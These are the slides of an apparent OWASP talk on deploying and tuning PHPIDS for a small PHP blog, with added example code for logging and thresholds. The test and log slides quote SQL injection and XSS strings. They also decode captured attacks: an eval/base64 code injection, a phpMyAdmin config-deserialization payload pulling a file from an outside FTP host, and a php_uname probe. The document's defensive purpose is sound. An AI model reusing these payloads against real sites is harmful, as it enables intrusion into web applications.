Using PHPIDS to Understand Attack Trends - OWASP


Using PHPIDS to Understand Attack Trends

@grecs

Infosec Career Start - WebAppSec

• Around 2002
• Sooo Much Simpler
  – No CSRF, Click-Jacking, … SQLi
  – No SOAP
  – No AJAX
  – No HTML5
• Had Our Problems
  – Browser Wars Still Going On
  – Per Browser Customizations
  – No Guidance
  – Limited Security Libraries
  – Immature Tools

Pic of hacked sites; news articles of breaches, mid-2000s

Infosec COTS

Agenda

• Introduction
• Why Use PHPIDS?
• What Is PHPIDS?
• Installation
• Maintenance & Operations
• Performance Issues
• Bypassing
• Detection Trends
• Use Within Other Tools
• Conclusion

Introduction

• Understand What People Could Be Hitting Site With
• Not Many Security Log Parsing Scripts
• Just Look Through & Look for “Things”
  – Only GET-Based Attacks Recorded
• Possible Tools for Monitoring
  – Simple Log Watcher (SWATCH)
  – PHPIDS
• PHPIDS
  – Open Source
  – Awesome Software
  – Little Documentation for Lay Tech Person Like Myself
  – Took Few Hours to Figure Out Ins & Outs (many more later to tweak, maintain, & really understand it)
  – Wanted to Document for Others to Use

Why Use PHPIDS?

• Mom & Pop Self-Hosted Blog
• $10/mo Shared Hosting Plan
• Limited Web Server Access/Control
  – Nothing at Network Level
    • NIDS (e.g., Snort)
  – Nothing at OS Level
  – Nothing at Web Server Level
    • WAF (e.g., modSecurity)
  – Limited at PHP Level
    • No Config Control (php.ini)
    • Full Control of PHP Written Code
• Forget Big Vendor $50K Software or Hardware Appliance

What Is PHPIDS?

• Definition

• Architecture

• Operational Flow

• Detection Mechanisms

What Is PHPIDS? – Definition

PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application. The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical impact rating which makes it easy to decide what kind of action should follow the hacking attempt. This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user’s session.

PHPIDS enables you to see who’s attacking your site and how and all without the tedious trawling of logfiles or searching hacker forums for your domain. Last but not least it’s licensed under the LGPL!

What Is PHPIDS? - Architecture

What Is PHPIDS? – Operational Flow

Diagram of operational flow; log outputs shown: Email, Database

What Is PHPIDS? – Detection Mechanisms

• Anti-Evasion Normalizations
  – Converter.php
• Signatures
  – default_filter.xml
• Centrifuge
  – Incoming Strings > 25 Characters
  – Ratio = Count of Word Characters, Spaces, Punctuation / Non-Word Characters
  – Lower the Ratio ~ Greater Probability of Attack
  – Normal = 7.5; Attack Trigger < 3.5
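To make the Centrifuge ratio concrete, here is an added example (not code from the talk or from PHPIDS itself) that computes the ratio as the slide defines it: normal characters over everything else, only for strings longer than 25 characters, flagging anything under 3.5. PHPIDS's own Centrifuge strips padding and applies several extra regexes before counting, so its numbers will differ; which punctuation counts as "normal" here is an assumption. The benign sample is constructed; the two payloads are the ones shown on the Verify Working and Interesting Detections slides.

```php
<?php
// Added example, not PHPIDS source: a simplified Centrifuge ratio following the
// slide's definition. The 25-character minimum and the 3.5 trigger come from
// the slide; the exact "normal" character set below is an assumption.

const CENTRIFUGE_MIN_LENGTH = 25;
const CENTRIFUGE_TRIGGER    = 3.5;

/**
 * Ratio of normal characters (letters, digits, whitespace, sentence punctuation)
 * to everything else. Returns null when the string is too short for Centrifuge
 * to look at (signatures still apply), INF when nothing unusual is present.
 */
function centrifuge_ratio(string $value): ?float
{
    // Byte length, as the slide's ">25 characters" check is on the raw string.
    if (strlen($value) <= CENTRIFUGE_MIN_LENGTH) {
        return null;
    }
    $normalClass = '\p{L}\d\s.,:;!?\-';
    $normal = preg_match_all('/[' . $normalClass . ']/u', $value);
    $other  = preg_match_all('/[^' . $normalClass . ']/u', $value);
    if ($other === 0) {
        return INF;
    }
    return $normal / $other;
}

/** True when the simplified Centrifuge would flag the string as an attack. */
function centrifuge_flags(string $value): bool
{
    $ratio = centrifuge_ratio($value);
    return $ratio !== null && $ratio < CENTRIFUGE_TRIGGER;
}

// Constructed benign sample plus two payloads taken from the slides.
$samples = [
    'benign comment'    => 'Please contact support@example.com about order #12345, thanks.',
    'short sqli (slide)'=> '\\"aaa\\" or 1=1;',
    'char_repl (slide)' => '\\\'{${die(eval(base64_decode($_POST[JUNGLIEZ])))}}\\\'=>',
];
foreach ($samples as $label => $value) {
    $ratio = centrifuge_ratio($value);
    printf("%-20s ratio=%s flagged=%s\n",
        $label,
        $ratio === null ? 'n/a (<= 25 chars)' : sprintf('%.2f', $ratio),
        centrifuge_flags($value) ? 'yes' : 'no');
}
```

The short SQL injection string is 15 characters, so Centrifuge never sees it and the signature rules in default_filter.xml are what catch it; the 53-character char_repl payload has 31 normal and 22 other characters, a ratio of about 1.41, well under the trigger, while the benign sentence scores about 30.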

Installation

• Install Code

• Create Reference File

• Include Reference File

• Verify Working

• Prepare for Production

Installation – Install Code

• Web Host
  – No Access to Recommended /var/lib Directory
  – Create “applications” Folder Off User’s Home Directory
  – Could Put in WWW Directory If Don’t Use DB Logging
  – Most Recommend Keeping Out of Web Root
• Upload & Unzip into Directory Outside of Web Root
  – ./applications/phpids-0.7
  – Keep Version Numbers for Easy Upgrades/Reverts

Installation – Create Reference File

• Create phpids.php File in Website’s Root
• Base on “phpids-0.7/docs/examples/example.php”
• Change Path References to PHPIDS Installation – Just Three Lines
• Verify Permissions to 644

First Change

    // set the include path properly for PHPIDS
    …
    . '/home/[user]/applications/phpids-x.x/lib'

Second Change

    /*
     * It's pretty easy to get the PHPIDS running
     * 1. Define what to scan
    …
    $init = IDS_Init::init('/home/[user]/applications/phpids-x.x/lib/IDS/Config/Config.ini.php');

Third Change

    /**
     * You can also reset the whole configuration
     * array or merge in own data
    …
    $init->config['General']['base_path'] = '/home/[user]/applications/phpids-x.x/lib/IDS/';

Installation – Include Reference File

• Include phpids.php in Template Files
• After Header Call
  – header.php
    • <?php include 'phpids.php'; ?>

Installation – Other Tweaks

• Email Detections
  – recipients[] = [email here]
• Exceptions

Installation Verify Working


Legend
  CSRF: Cross-Site Request Forgery
  DT: Directory Traversal
  ID: Information Disclosure
  LFI: Local File Inclusion
  RFE: Remote File Execution
  SQLI: SQL Injection
  XSS: Cross-Site Scripting

Installation Verify Working

• Verify Logged

    "a.b.c.d",2012-04-05T19:20:03+00:00,26,"sqli id lfi","REQUEST.test%3D%255C%2522aaa%255C%2522%2520or%25201%253D1%253B+GET.test%3D%255C%2522aaa%255C%2522%2520or%25201%253D1%253B","%2F%3Ftest%3D%2522aaa%2522%2520or%25201%3D1%3B","e.f.h.i"

  – Decoded: REQUEST=\"aaa\" or 1=1;

Installation Verify Working

• Additional Examples To Try
  – ?test=’%20OR%201=1--
  – ?test=”>XXX
• Cleanup phpids.php
• Comment Out
  – Initial Echo
  – Commands that Show It Detected an Attack
• Optional
  – Remove All Folders in PHPIDS Directory Except for “./phpids-0.7/lib/IDS”
• Final Test – Previous Slides

Installation Prepare for Production

    …
    /* echo $result; */
    …
    /* require_once 'IDS/Log/Database.php'; */
    …
    /* IDS_Log_Database::getInstance($init) */
    …
    }
    /* else {
        echo '<a href="?test=%22><script>eval(window.name)</script>">No attack detected – click for an example attack</a>';
    } */
    …

Maintenance & Operations

• Calibrating Installation

• Updating Signatures

• Keeping Attackers Away

• Adding Thresholds

Maintenance & Ops – Calibrating Installation

• Lots of Google Analytics Cookie False Positives
  – Add Exceptions to Config
  – Comes with Two Related Amazon Exceptions ~ GET
  – Add New Under Two Default Exceptions
    • exceptions[] = COOKIE.__utmz

    "x.x.x.x",yyyy-mm-ddT19:31:03-05:00,12,"xss csrf id rfe lfi","COOKIE.__utmz=123456789.1234567890.1.1.utmcsr%3Dgoogle%7Cutmccn%3D%28organic%29%7Cutmcmd%3Dorganic%7Cutmctr%3DNOVA%20cyber%20defense","%2F2009%2F10%2F16%2Fin-focus-advertise-with-us%2F","xx.x.xxx.xxx"
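Reviewing these file-logger lines by hand is how the talk says most people find false positives. The following added example (not code from the talk or from PHPIDS) parses lines in the format shown on the Verify Working and Calibrating slides, decodes the affected parameters, replays an exception list over them to see which events calibration would have silenced, and tallies the tags that remain, which is the raw material for the detection trends the talk is about. The two log lines are constructed to match the slides' format (addresses and times are placeholders); exceptions are matched by exact parameter name, the simple form the slides use; and because the two PHPIDS versions on the slides encode the parameter value a different number of times, the value is decoded a second time only while percent-escapes remain, a heuristic of this example.

```php
<?php
// Added example, not PHPIDS source: parse PHPIDS file-logger lines
//   "ip",timestamp,impact,"tags","affected parameters","uri","origin"
// decode the parameters, apply the exception list, and tally tags.

// Constructed sample log in the slides' format (placeholder addresses/times).
$sampleLog = <<<'LOG'
"203.0.113.10",2012-04-05T19:20:03+00:00,26,"sqli id lfi","REQUEST.test%3D%255C%2522aaa%255C%2522%2520or%25201%253D1%253B+GET.test%3D%255C%2522aaa%255C%2522%2520or%25201%253D1%253B","%2F%3Ftest%3D%2522aaa%2522%2520or%25201%3D1%3B","203.0.113.20"
"203.0.113.11",2012-04-05T19:31:03-05:00,12,"xss csrf id rfe lfi","COOKIE.__utmz=123456789.1234567890.1.1.utmcsr%3Dgoogle%7Cutmccn%3D%28organic%29%7Cutmcmd%3Dorganic%7Cutmctr%3DNOVA%20cyber%20defense","%2F2009%2F10%2F16%2Fin-focus-advertise-with-us%2F","203.0.113.21"
LOG;

/** Split the affected-parameters field into name => decoded value. */
function decode_params(string $field): array
{
    $out = [];
    // Entries are separated by a space, which the logger may have encoded as '+'.
    foreach (preg_split('/[ +]+/', $field, -1, PREG_SPLIT_NO_EMPTY) as $token) {
        $token = urldecode($token);
        $eq = strpos($token, '=');
        if ($eq === false) {
            continue;
        }
        $name  = substr($token, 0, $eq);
        $value = substr($token, $eq + 1);
        // Heuristic: older loggers encode the value twice; decode again while escapes remain.
        if (preg_match('/%[0-9A-Fa-f]{2}/', $value)) {
            $value = urldecode($value);
        }
        $out[$name] = $value;
    }
    return $out;
}

/** Parse one log line; null if it does not have the seven expected fields. */
function parse_phpids_line(string $line): ?array
{
    $fields = str_getcsv(trim($line), ',', '"', '');
    if (count($fields) < 7) {
        return null;
    }
    [$ip, $time, $impact, $tags, $params, $uri, $origin] = $fields;
    return [
        'ip'     => $ip,
        'time'   => $time,
        'impact' => (int) $impact,
        'tags'   => preg_split('/\s+/', trim($tags), -1, PREG_SPLIT_NO_EMPTY),
        'params' => decode_params($params),
        'uri'    => urldecode($uri),
        'origin' => $origin,
    ];
}

/**
 * Replay the exception list: an event whose every parameter is excepted would
 * not have been reported after calibration. Returns the tag tally over the
 * remaining events plus all parsed events with a 'suppressed' flag.
 */
function summarize_log(string $log, array $exceptions): array
{
    $tagCounts = [];
    $events    = [];
    foreach (preg_split('/\R/', $log, -1, PREG_SPLIT_NO_EMPTY) as $line) {
        $event = parse_phpids_line($line);
        if ($event === null) {
            continue;
        }
        $remaining = array_diff_key($event['params'], array_flip($exceptions));
        $event['suppressed'] = ($remaining === []);
        if (!$event['suppressed']) {
            foreach ($event['tags'] as $tag) {
                $tagCounts[$tag] = ($tagCounts[$tag] ?? 0) + 1;
            }
        }
        $events[] = $event;
    }
    arsort($tagCounts);
    return ['tags' => $tagCounts, 'events' => $events];
}

// The two default GET exceptions plus the COOKIE one added on the slide.
$summary = summarize_log($sampleLog, ['GET.__utmz', 'GET.__utmc', 'COOKIE.__utmz']);
foreach ($summary['events'] as $e) {
    printf("%s impact=%d%s\n", $e['time'], $e['impact'],
        $e['suppressed'] ? ' (covered by exception)' : '');
    foreach ($e['params'] as $name => $value) {
        printf("  %s = %s\n", $name, $value);
    }
}
print_r($summary['tags']);
```

With this input the first event decodes to `REQUEST.test = \"aaa\" or 1=1;` (and the same for GET.test) and counts one each for sqli, id and lfi, while the Google Analytics cookie event is reported as covered once COOKIE.__utmz is on the exception list, which is the check to run before adding a broader exception such as all COOKIE parameters.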

Maintenance & Operations – Calibrating Installation

• Lived with For Awhile But Still Lots of False Positives
  – Get Feel for What Install Is Picking Up
  – Slowly Tweak Exceptions to Meet Needs
• ColdFusion Cookies Plaguing Me?
  – exceptions[] = COOKIE.CFGLOBALS
• Other Google Analytics?
  – GET, POST, REQUEST, & COOKIE Methods
  – .utmz and .utmc
• Exception for All COOKIE Methods?
• Recommend Using Minimum Necessary

Maintenance & Ops – Updating Signatures

• Signature Based – Keep Up to Date
• Download from PHPIDS.org & Overwrite
  – default_filter.xml
  – Converter.php
• Every 2 or 3 Months
• Upgrading PHPIDS Software
  – Install in Peer Folder
    • phpids-0.8
  – Point phpids.php Paths to New Version

Maintenance & Ops – Keeping Attackers Away

• Simple Impact Threshold Blocking
• phpids.php
  – if (!$result->isEmpty()) {}
  – if (!$result->isEmpty()) {die('<h1>Go away!</h1>');}
• Risk Turning FPs Away
• Set Threshold for “die” Statement
  – if ($result->getImpact() >= 50) { die('<h1>Go away!</h1>'); }

Maintenance & Operations Adding Thresholds

• Only Alert by Email If Impact above Certain Level

• Suggested – Logging to File >= 10

– Logging to DB >= 25

– Report by Email >=50

– Stop Loading Page >= 100 (die($msg))

• CakePHP Example Provides Relatively Complex Code for Thresholding for IDS Reactions

Maintenance & Ops – Adding Thresholds

• phpids.php
  – From: if (!$result->isEmpty()) {}
  – Replaced Below to Be Conditional
    • $compositeLog->addLogger(IDS_Log_Email::getInstance($init) .. <stuff I commented out> ..);
    • if ($result->getImpact() >= 25) { <the above compositeLog code> }
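Putting the Create Reference File, Keeping Attackers Away and Adding Thresholds slides together, here is an added example of a complete phpids.php (not the talk's own file, and not PHPIDS's example.php) in the shape of PHPIDS 0.7's docs/examples/example.php: the three path changes, the calibration exceptions from the Maintenance slides, and the suggested thresholds (file >= 10, database >= 25, email >= 50, die >= 100). It assumes the 0.7 API named on the slides (IDS_Init::init, IDS_Monitor::run, IDS_Result::getImpact, IDS_Log_Composite with the File, Database and Email loggers) and that the exceptions key lives under [General] in Config.ini.php as the default GET exceptions do; /home/[user]/applications/phpids-0.7 is the placeholder install path from the slides.

```php
<?php
// Added example, not the talk's own phpids.php: reference file with the three
// path changes from the Installation slides and tiered reactions by impact.

$phpidsHome = '/home/[user]/applications/phpids-0.7';   // placeholder install path

// Change 1: include path to the PHPIDS lib directory.
set_include_path(get_include_path() . PATH_SEPARATOR . $phpidsHome . '/lib');

require_once 'IDS/Init.php';
require_once 'IDS/Monitor.php';
require_once 'IDS/Log/Composite.php';
require_once 'IDS/Log/File.php';
require_once 'IDS/Log/Database.php';
require_once 'IDS/Log/Email.php';

// Change 2: configuration file. Change 3: base_path.
$init = IDS_Init::init($phpidsHome . '/lib/IDS/Config/Config.ini.php');
$init->config['General']['base_path']     = $phpidsHome . '/lib/IDS/';
$init->config['General']['use_base_path'] = true;

// Calibration exceptions from the Maintenance slides (assumed to live under
// [General] like the two default GET exceptions). Keep this list minimal.
$init->config['General']['exceptions'][] = 'COOKIE.__utmz';
$init->config['General']['exceptions'][] = 'COOKIE.__utmc';
$init->config['General']['exceptions'][] = 'COOKIE.CFGLOBALS';

// Inputs to scan, as in example.php.
$request = array(
    'REQUEST' => $_REQUEST,
    'GET'     => $_GET,
    'POST'    => $_POST,
    'COOKIE'  => $_COOKIE,
);

$ids    = new IDS_Monitor($request, $init);
$result = $ids->run();

if (!$result->isEmpty()) {
    $impact       = $result->getImpact();
    $compositeLog = new IDS_Log_Composite();

    // Thresholds suggested on the Adding Thresholds slide.
    if ($impact >= 10) {
        $compositeLog->addLogger(IDS_Log_File::getInstance($init));
    }
    if ($impact >= 25) {
        $compositeLog->addLogger(IDS_Log_Database::getInstance($init));
    }
    if ($impact >= 50) {
        $compositeLog->addLogger(IDS_Log_Email::getInstance($init));
    }
    $compositeLog->execute($result);

    // Log first, then refuse to render the page only for the highest impacts,
    // so a false positive at a low score is recorded rather than turned away.
    if ($impact >= 100) {
        die('<h1>Go away!</h1>');
    }
}
```

Logging runs before the die so that even the blocked request leaves a record to review during calibration; the loggers are added one at a time so each tier is independent of the others.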

Performance Issues

• Lots of Contention

• Some Say No Effect

• Others Say Big Effect

• IronGeek Used but Removed

Performance Issues

• Developer Profiled CakePHP 1.1 in 3/2008
• Xdebug Profiler Output in KCachegrind
  – Profiler Screenshot (highlighted value: 0.54%)

Performance Issues

• Pingdom.com
  – Website Uptime & Performance Monitoring
  – Response Time
    • 10 Sites Globally: 1145 ms
    • 4 Sites US: 845 ms

Interesting Detections

• IP: a.b.c.d
  Date: 2012-01-31
  Impact: 92
  Affected tags: xss csrf id rfe sqli lfi
  Affected parameters: REQUEST.char_repl=%5C%27%7B%24%7Bdie%28eval%28base64_decode%28%24_POST%5BJUNGLIEZ%5D%29%29%29%7D%7D%5C%27%3D%3E, POST.char_repl=%5C%27%7B%24%7Bdie%28eval%28base64_decode%28%24_POST%5BJUNGLIEZ%5D%29%29%29%7D%7D%5C%27%3D%3E
  Request URI: /vbseocp.php
  – Decoded: \'{${die(eval(base64_decode($_POST[JUNGLIEZ])))}}\'=>, POST.char_repl=\'{${die(eval(base64_decode($_POST[JUNGLIEZ])))}}\'=>

Interesting Detections

• IP: a.b.c.d
  Date: 2012-01-24
  Impact: 44
  Affected tags: xss csrf id rfe sqli lfi
  Affected parameters: REQUEST.configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%5C%22PMA_Config%5C%22%3A1%3A%7Bs%3A6%3A%5C%22source%5C%22%3Bs%3A48%3A%5C%22ftp%3A%2F%2Fu966867539%3A240790%4031.170.163.212%2F.a%2Fid.txt%5C%22%3B%7D%7D, POST.configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%5C%22PMA_Config%5C%22%3A1%3A%7Bs%3A6%3A%5C%22source%5C%22%3Bs%3A48%3A%5C%22ftp%3A%2F%2Fu966867539%3A240790%4031.170.163.212%2F.a%2Fid.txt%5C%22%3B%7D%7D
  Request URI: /pma/scripts/setup.php
  – Decoded: a:1:{i:0;O:10:\"PMA_Config\":1:{s:6:\"source\";s:48:\"ftp://u966867539:240790@31.170.163.212/.a/id.txt\";}}, POST.configuration=a:1:{i:0;O:10:\"PMA_Config\":1:{s:6:\"source\";s:48:\"ftp://u966867539:240790@31.170.163.212/.a/id.txt\";}}

Interesting Detections

• IP: a.b.c.d
  Date: 2012-01-22
  Impact: 26
  Affected tags: sqli id lfi xss csrf rfe
  Affected parameters: REQUEST.author_name=%5Bphp%5Decho%28%5C%27Origins%5C%27.php_uname%28%29.%5C%27scanner%5C%27%29%3Bdie%28%29%3B%5B%2Fphp%5D, POST.author_name=%5Bphp%5Decho%28%5C%27Origins%5C%27.php_uname%28%29.%5C%27scanner%5C%27%29%3Bdie%28%29%3B%5B%2Fphp%5D
  Request URI: /email.php
  – Decoded: [php]echo(\'Origins\'.php_uname().\'scanner\');die();[/php], POST.author_name=[php]echo(\'Origins\'.php_uname().\'scanner\');die();[/php]

Use within Other Tools

• PHPIDS Not Meant to Be Complete Tool
• Plumbing that Other Tools Can Include to Perform More Advanced Analysis/Capabilities
  – Shunning IP Addresses for Period of Time
• WordPress
  – WPIDS – Abandoned?
  – Mute Screamer
• Others
  – ModSecurity (uses default filter rules)
  – Drupal Module
  – Mediawiki Extension
  – ZIDS (Zend framework)
  – px_phpids (Typo3)
  – Dotnetids (ASP.NET apps)

References

• Intrusion Detection For PHP Applications With PHPIDS
  – http://www.howtoforge.com/intrusion-detection-for-php-applications-with-phpids
• Getting Started with the PHPIDS Intrusion Detection System
  – http://www.h-online.com/security/features/Getting-started-with-the-PHPIDS-intrusion-detection-system-746233.html
• PHPIDS FAQ
  – http://php-ids.org/faq/
• http://forum.cmsmadesimple.org/index.php?topic=12884.msg173160
• PHPIDS Install Notes
  – http://www.irongeek.com/i.php?page=security/phpids-install-notes
• PHPIDS - Monitoring attack surface activity
  – https://docs.google.com/Doc?id=dd7x5smw_17g9cnx2cn&pli=1
• http://holisticinfosec.org/toolsmith/docs/july2008.pdf
• Wikipedia
  – https://en.wikipedia.org/wiki/PHPIDS
• PHPIDS Forum

Conclusion

• Security Layer for PHP Web Application Where Attacks Detected & Given Numerical Impact Rating
• Fits Mom & Pop Scenario
  – Normal Enterprise this Would Never Do
  – Part of Layered Defense
• Keep PHP Application Patched/Up to Date
• PHPIDS
  – Easy Installation & Maintenance
  – Need to Refine Over Time
  – Customize with Exceptions/Alert Thresholds
  – Detection Trends
  – CMS Plugins that Provide Advanced Functionality to “Plumbing”

Contact Info

• Twitter @grecs

• Website NovaInfosecPortal.com

• Contact http://bit.ly/nispcontact

Questions?
